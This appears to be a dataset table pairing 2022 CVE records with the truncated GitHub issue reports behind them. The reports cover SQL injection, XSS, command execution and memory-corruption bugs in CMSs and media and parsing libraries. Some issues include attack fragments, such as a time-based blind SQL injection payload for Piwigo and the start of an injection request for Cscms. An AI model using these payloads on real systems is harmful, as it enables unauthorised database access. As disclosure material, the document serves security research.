cve_id stringlengths 13 16 | cve_published stringlengths 23 23 | cve_descriptions stringlengths 48 2.08k | cve_metrics dict | cve_references listlengths 1 138 | cve_configurations listlengths 1 39 | url stringlengths 37 77 | cve_tags listlengths 1 4 ⌀ | domain stringclasses 1
value | issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 88.6k ⌀ | issue_title stringlengths 3 335 | issue_comments_url stringlengths 56 81 | issue_comments_count int64 0 146 | issue_created_at stringlengths 20 20 | issue_updated_at stringlengths 20 20 | issue_html_url stringlengths 37 62 | issue_github_id int64 104M 2.09B | issue_number int64 1 122k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2022-27985 | 2022-04-26T14:15:41.763 | CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://cuppa.com"
},
{
"source": "nvd@nist.gov",
"tags": [
"Product"
],
"url": "http://www.cuppacms.com/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/CuppaCMS/CuppaCMS/issues/31 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"CuppaCMS",
"CuppaCMS"
] | * VULNERABLE: SQL injection vulnerability exists in CuppaCMS. An attacker can inject query in
“/administrator/alerts/alertLightbox.php" via the "params%5Bgroup%5D=2" parameters.
* Github: https://github.com/JiuBanSec
* Product: CuppaCMS
* Impact: Allow attacker inject query and access , disclosure of all data on th... | SQL injection vulnerability exists in CuppaCMS /administrator/alerts/alertLightbox.php | https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/31/comments | 0 | 2022-03-22T16:24:01Z | 2022-03-22T16:24:01Z | https://github.com/CuppaCMS/CuppaCMS/issues/31 | 1,177,004,325 | 31 |
CVE-2022-28085 | 2022-04-27T03:15:39.650 | A flaw was found in htmldoc commit 31f7804. A heap buffer overflow in the function pdf_write_names in ps-pdf.cxx may lead to arbitrary code execution and Denial of Service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/michaelrsweet/htmldoc/commit/46c8ec2b9bccb8ccabff52d998c5eee77a228348"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Ad... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:htmldoc_project:htmldoc:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F787F29F-1158-45BF-861E-34694739EDD6",
"versionEndExcluding": "2022-03-24",
"versionEndIncluding": null,
"versio... | https://github.com/michaelrsweet/htmldoc/issues/480 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"michaelrsweet",
"htmldoc"
] | # Description
Whilst experimenting with `htmldoc`, built from commit [31f7804](https://github.com/michaelrsweet/htmldoc/tree/31f780487e5ddc426888638786cdc47631687275), we are able to induce a vulnerability in function `pdf_write_names` , using a harness compiled from `htmldoc/htmldoc.cxx`.
Because there is no bo... | AddressSanitizer: heap-buffer-overflow in function pdf_write_names | https://api.github.com/repos/michaelrsweet/htmldoc/issues/480/comments | 7 | 2022-03-24T12:44:48Z | 2022-05-19T16:24:33Z | https://github.com/michaelrsweet/htmldoc/issues/480 | 1,179,466,461 | 480 |
CVE-2021-41959 | 2022-05-03T11:15:07.130 | JerryScript Git version 14ff5bf does not sufficiently track and release allocated memory via jerry-core/ecma/operations/ecma-regexp-object.c after RegExp, which causes a memory leak. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/4781"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4EB495C8-348F-4B04-B31F-1F4EE471CC22",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | https://github.com/jerryscript-project/jerryscript/issues/4781 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
14ff5bf
###### Build platform
Ubuntu 20.04.3 LTS (Linux 5.11.0-34-generic x86_64)
###### Build steps
```sh
./tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \
--clean --debug --strip=off --logging=on --error-messages=on \
--compile-flag=-fsanitize=address --sta... | Unfreed float causing memory leak in ecma-regexp-object | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4781/comments | 2 | 2021-09-27T07:23:09Z | 2021-10-04T11:12:53Z | https://github.com/jerryscript-project/jerryscript/issues/4781 | 1,007,794,199 | 4,781 |
CVE-2022-28505 | 2022-05-03T17:15:07.730 | Jfinal_cms 5.1.0 is vulnerable to SQL Injection via com.jflyfox.system.log.LogController.java. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jflyfox/jfinal_cms/issues/33"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/jflyfox/jfinal_cms/issues/33 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"jflyfox",
"jfinal_cms"
] | # SQL injection vulnerability exists in JFinal CMS 5.1.0
# Analysis
The vulnerability appears in lines 23-47 of the **com.jflyfox.system.log.LogController.java**

Here call **SQLUtils** to query with th... | [CVE-2022-28505] SQL injection vulnerability exists in JFinal CMS 5.1.0 | https://api.github.com/repos/jflyfox/jfinal_cms/issues/33/comments | 0 | 2022-03-29T08:03:30Z | 2022-05-03T17:07:15Z | https://github.com/jflyfox/jfinal_cms/issues/33 | 1,184,471,428 | 33 |
CVE-2022-28599 | 2022-05-03T18:15:08.983 | A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS 1.5.1 that allows an authenticated user to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/595"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "F3A806A2-582F-49B6-B9EC-C0FB4B13ED3D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"version... | https://github.com/daylightstudio/FUEL-CMS/issues/595 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] | A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 that allows an authenticated user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack.
1、login as admin .in the Assets page
![i... | A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/595/comments | 0 | 2022-04-02T09:29:18Z | 2022-04-02T09:38:57Z | https://github.com/daylightstudio/FUEL-CMS/issues/595 | 1,190,577,090 | 595 |
CVE-2022-27431 | 2022-05-04T03:15:07.367 | Wuzhicms v4.1.0 was discovered to contain a SQL injection vulnerability via the groupid parameter at /coreframe/app/member/admin/group.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/wuzhicms/wuzhicms/issues/200"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:wuzhicms:wuzhi_cms:4.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F4749403-9C42-40DF-A695-A9E31BD37D84",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/wuzhicms/wuzhicms/issues/200 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"wuzhicms",
"wuzhicms"
] | Vulnerability file:
---
/coreframe/app/member/admin/group.php:132-160
public function del() {
if(isset($GLOBALS['groupid']) && $GLOBALS['groupid']) {
if(is_array($GLOBALS['groupid'])) {
$where = ' IN ('.implode(',', $GLOBALS['groupid']).')';
foreach($GLOBALS['groupid'] as $gid) {
$this... | Wuzhicms v4.1.0 /coreframe/app/member/admin/group.php hava a SQL Injection Vulnerability | https://api.github.com/repos/wuzhicms/wuzhicms/issues/200/comments | 0 | 2022-03-18T07:58:14Z | 2022-03-18T07:58:14Z | https://github.com/wuzhicms/wuzhicms/issues/200 | 1,173,293,142 | 200 |
CVE-2022-28487 | 2022-05-04T15:15:12.863 | Tcpreplay version 4.4.1 contains a memory leakage flaw in fix_ipv6_checksums() function. The highest threat from this vulnerability is to data confidentiality. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/appneta/tcpreplay/issues/723"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:broadcom:tcpreplay:4.4.1:*:*:*:*:*:*:*",
"matchCriteriaId": "820B7B7A-25F9-42C6-B0B0-0A2A34648477",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/appneta/tcpreplay/issues/723 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"appneta",
"tcpreplay"
] | **Describe the bug**
Tcpreplay version 4.4.1 contains a memory leakage flaw, CWE-134 vulnerability in fix_ipv6_checksums() function. The highest threat from this vulnerability is to data confidentiality. The inputs required to exploit the vulnerability is unknown.
https://github.com/appneta/tcpreplay/blob/09f07748d... | [Bug] Format string vulnerability in fix_ipv6_checksums() function | https://api.github.com/repos/appneta/tcpreplay/issues/723/comments | 1 | 2022-03-28T20:35:50Z | 2022-08-01T20:27:50Z | https://github.com/appneta/tcpreplay/issues/723 | 1,183,961,497 | 723 |
CVE-2022-28552 | 2022-05-04T15:15:12.997 | Cscms 4.1 is vulnerable to SQL Injection. Log into the background, open the song module, create a new song, delete it to the recycle bin, and SQL injection security problems will occur when emptying the recycle bin. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/chshcms/cscms/issues/10"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:chshcms:cscms:4.1:*:*:*:*:*:*:*",
"matchCriteriaId": "1DCFB098-04A8-43FE-AF93-0BE46815BAA3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding"... | https://github.com/chshcms/cscms/issues/10 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"chshcms",
"cscms"
] | Log in to the background, open the song module, create a new song, delete it to the recycle bin, and SQL injection security problems will occur when emptying the recycle bin.
```
POST /admin.php/dance/admin/dance/save HTTP/1.1
Host: cscms.test
Content-Length: 292
Accept: application/json, text/javascript, */*; q=0... | Cscms V4.1 has sqlinjection | https://api.github.com/repos/chshcms/cscms/issues/10/comments | 0 | 2022-01-18T08:12:55Z | 2022-01-18T08:12:55Z | https://github.com/chshcms/cscms/issues/10 | 1,106,596,877 | 10 |
CVE-2021-42242 | 2022-05-05T13:15:07.733 | A command execution vulnerability exists in jfinal_cms 5.0.1 via com.jflyfox.component.controller.Ueditor. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jflyfox/jfinal_cms/issues/28"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "6B6DB5AB-BFDE-4433-AB8B-7C2479221D55",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/jflyfox/jfinal_cms/issues/28 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"jflyfox",
"jfinal_cms"
] | # Vulnerability summary
A command execution vulnerability exists in jfinal_cms 5.0.1
JDK version requirements:
- JDK version used based on RMI<=6u141, 7u131, 8u121
- JDK version used based on LDAP<=6u211, 7u201, 8u191.
jfinal_cms version:5.0.1
fastjson version:1.2.28
, the function bmp_load() in bmp.c contains an integer overflow vulnerability, which eventually results in the heap overflow in jfif_encode() in jfif.c. This is due to the incomplete patch for issue 38 | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/rockcarry/ffjpeg/issues/49"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rockcarry:ffjpeg:2021-12-06:*:*:*:*:*:*:*",
"matchCriteriaId": "A3438805-CAF0-41AE-BC2A-3A11A252D8E6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStart... | https://github.com/rockcarry/ffjpeg/issues/49 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"rockcarry",
"ffjpeg"
] | **version**: master (commit [caade60](https://github.com/rockcarry/ffjpeg/commit/caade60a69633d74100bd3c2528bddee0b6a1291))
**poc**: [poc](https://github.com/dandanxu96/PoC/blob/main/ffjpeg/ffjpeg-bmp_load-integer-overflow)
**command**: ./ffjpeg -e $poc$
Here is the trace reported by ASAN:
```
user@c3ae4d510abb:... | Integer overflow in bmp_load() resulting in heap overflow in jfif_encode() at jfif.c:763 | https://api.github.com/repos/rockcarry/ffjpeg/issues/49/comments | 7 | 2022-03-25T10:42:12Z | 2022-05-21T02:29:45Z | https://github.com/rockcarry/ffjpeg/issues/49 | 1,180,627,632 | 49 |
CVE-2022-29339 | 2022-05-05T13:15:07.927 | In GPAC 2.1-DEV-rev87-g053aae8-master, function BS_ReadByte() in utils/bitstream.c has a failed assertion, which causes a Denial of Service. This vulnerability was fixed in commit 9ea93a2. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/commit/9ea93a2ec8f555ceed1ee27294cf94822f14f10f"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A97931ED-0014-4D2C-969E-5B41DDFF9DD2",
"versionEndExcluding": "2022-04-12",
"versionEndIncluding": null,
"versionStartExcludin... | https://github.com/gpac/gpac/issues/2165 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | **version info:**
```
root@d8a714203f6e:# ./MP4Box -version
MP4Box - GPAC version 2.1-DEV-rev87-g053aae8-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://do... | Assertion failed in BS_ReadByte, utils/bitstream.c:383 | https://api.github.com/repos/gpac/gpac/issues/2165/comments | 0 | 2022-04-08T08:28:19Z | 2022-04-12T09:01:22Z | https://github.com/gpac/gpac/issues/2165 | 1,197,007,820 | 2,165 |
CVE-2022-29340 | 2022-05-05T13:15:07.967 | GPAC 2.1-DEV-rev87-g053aae8-master. has a Null Pointer Dereference vulnerability in gf_isom_parse_movie_boxes_internal due to improper return value handling of GF_SKIP_BOX, which causes a Denial of Service. This vulnerability was fixed in commit 37592ad. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/commit/37592ad86c6ca934d34740012213e467acc4a3b0"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A97931ED-0014-4D2C-969E-5B41DDFF9DD2",
"versionEndExcluding": "2022-04-12",
"versionEndIncluding": null,
"versionStartExcludin... | https://github.com/gpac/gpac/issues/2163 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | **version info:**
```
root@d8a714203f6e:# ./MP4Box -version
MP4Box - GPAC version 2.1-DEV-rev87-g053aae8-master
(c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
Please cite our work in your research:
GPAC Filters: https://doi.org/10.1145/3339825.3394929
GPAC: https://do... | NULL Pointer Dereference still exists in gf_isom_parse_movie_boxes_internal | https://api.github.com/repos/gpac/gpac/issues/2163/comments | 1 | 2022-04-01T12:17:54Z | 2022-04-12T09:01:21Z | https://github.com/gpac/gpac/issues/2163 | 1,189,714,047 | 2,163 |
CVE-2020-19212 | 2022-05-06T14:15:08.217 | SQL Injection vulnerability in admin/group_list.php in piwigo v2.9.5, via the group parameter to delete. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1009"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:2.9.5:*:*:*:*:*:*:*",
"matchCriteriaId": "4803EBB7-FB18-4FB3-A3B1-A476BB2E20AF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | https://github.com/Piwigo/Piwigo/issues/1009 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Piwigo",
"Piwigo"
] | An SQL injection has been discovered in the administration panel of Piwigo v2.9.5. The vulnerability allows remote attackers that are authenticated as administrator to inject SQL code into a query and display. This could result in full information disclosure.
The vulnerability was found in the 'delete' method in adm... | SQL injection in group_list.php | https://api.github.com/repos/Piwigo/Piwigo/issues/1009/comments | 1 | 2019-05-05T08:40:59Z | 2019-08-12T12:26:39Z | https://github.com/Piwigo/Piwigo/issues/1009 | 440,418,682 | 1,009 |
CVE-2020-19213 | 2022-05-06T14:15:08.267 | SQL Injection vulnerability in cat_move.php in piwigo v2.9.5, via the selection parameter to move_categories. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1010"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:2.9.5:*:*:*:*:*:*:*",
"matchCriteriaId": "4803EBB7-FB18-4FB3-A3B1-A476BB2E20AF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | https://github.com/Piwigo/Piwigo/issues/1010 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Piwigo",
"Piwigo"
] | Hi, I found a sql injection vulnerability in cat_move.php:
The 'move_categories' method is called when moving the album in '/admin.php?page=cat_move', but the method does not validate and filter the 'selection' and 'parent' parameters, thus causing the vulnerability.
**replace any of the following parameter in PO... | SQL injection in cat_move.php | https://api.github.com/repos/Piwigo/Piwigo/issues/1010/comments | 2 | 2019-05-06T10:00:18Z | 2019-08-12T14:24:47Z | https://github.com/Piwigo/Piwigo/issues/1010 | 440,625,122 | 1,010 |
CVE-2020-19215 | 2022-05-06T14:15:08.313 | SQL Injection vulnerability in admin/user_perm.php in piwigo v2.9.5, via the cat_false parameter to admin.php?page=user_perm. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1011"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:2.9.5:*:*:*:*:*:*:*",
"matchCriteriaId": "4803EBB7-FB18-4FB3-A3B1-A476BB2E20AF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | https://github.com/Piwigo/Piwigo/issues/1011 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Piwigo",
"Piwigo"
] | hi, I found two new vulnerabilities in admin/user_perm.php and admin/group_perm.php
1 :
request http://xx.xx.xx.xx/admin.php?page=user_perm&user_id=1 /Need to have a private album
then move the album from the right to the left
payload: ```1 and if(ascii(substr(database(),1,1))>97,1,sleep(5))``` or use 'sqlma... | SQL injection in user/group permissions manager | https://api.github.com/repos/Piwigo/Piwigo/issues/1011/comments | 3 | 2019-05-07T10:09:41Z | 2019-08-12T14:46:29Z | https://github.com/Piwigo/Piwigo/issues/1011 | 441,151,429 | 1,011 |
CVE-2020-19217 | 2022-05-06T14:15:08.407 | SQL Injection vulnerability in admin/batch_manager.php in piwigo v2.9.5, via the filter_category parameter to admin.php?page=batch_manager. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTI... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1012"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:2.9.5:*:*:*:*:*:*:*",
"matchCriteriaId": "4803EBB7-FB18-4FB3-A3B1-A476BB2E20AF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | https://github.com/Piwigo/Piwigo/issues/1012 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Piwigo",
"Piwigo"
] | hi,There is a vulnerability in the admin/batch_manager.php.

I didn't find the full trigger request in the browser, so I added the ‘&filter_category_use=on’ parameter to the request based on the code.
``... | SQL injection in admin/batch_manager.php | https://api.github.com/repos/Piwigo/Piwigo/issues/1012/comments | 1 | 2019-05-08T08:06:27Z | 2019-08-12T12:53:25Z | https://github.com/Piwigo/Piwigo/issues/1012 | 441,604,948 | 1,012 |
CVE-2022-28463 | 2022-05-08T23:15:17.820 | ImageMagick 7.1.0-27 is vulnerable to Buffer Overflow. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/ca3654ebf7a439dc736f56f083c9aa98e4464b7f"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party ... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.1.0-27:*:*:*:*:*:*:*",
"matchCriteriaId": "0B494258-E7BF-4584-800D-D2D893003E17",
"versionEndExcluding": null,
"versionEndIncluding": null,
"version... | https://github.com/ImageMagick/ImageMagick/issues/4988 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### ImageMagick version
7.1.0-27
### Operating system
Linux
### Operating system, version and so on
Linux d477f3580ae9 5.4.0-105-generic #119~18.04.1-Ubuntu SMP Tue Mar 8 11:21:24 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
### Description
Hello,
We are currently working on fuzz testing feature, and w... | AddressSanitizer: heap-buffer-overflow /src/imagemagick/./MagickCore/quantum-private.h:256:27 in PushLongPixel | https://api.github.com/repos/ImageMagick/ImageMagick/issues/4988/comments | 3 | 2022-03-25T05:27:23Z | 2022-04-30T09:27:47Z | https://github.com/ImageMagick/ImageMagick/issues/4988 | 1,180,362,220 | 4,988 |
CVE-2022-27114 | 2022-05-09T17:15:09.130 | There is a vulnerability in htmldoc 1.9.16. In image_load_jpeg function image.cxx when it calls malloc,'img->width' and 'img->height' they are large enough to cause an integer overflow. So, the malloc function may return a heap blosmaller than the expected size, and it will cause a buffer overflow/Address boundary erro... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/michaelrsweet/htmldoc/commit/31f780487e5ddc426888638786cdc47631687275"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Ad... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:htmldoc_project:htmldoc:1.9.16:*:*:*:*:*:*:*",
"matchCriteriaId": "9F8B9DF8-F081-4B99-B173-222A5BD2552E",
"versionEndExcluding": null,
"versionEndIncluding": null,
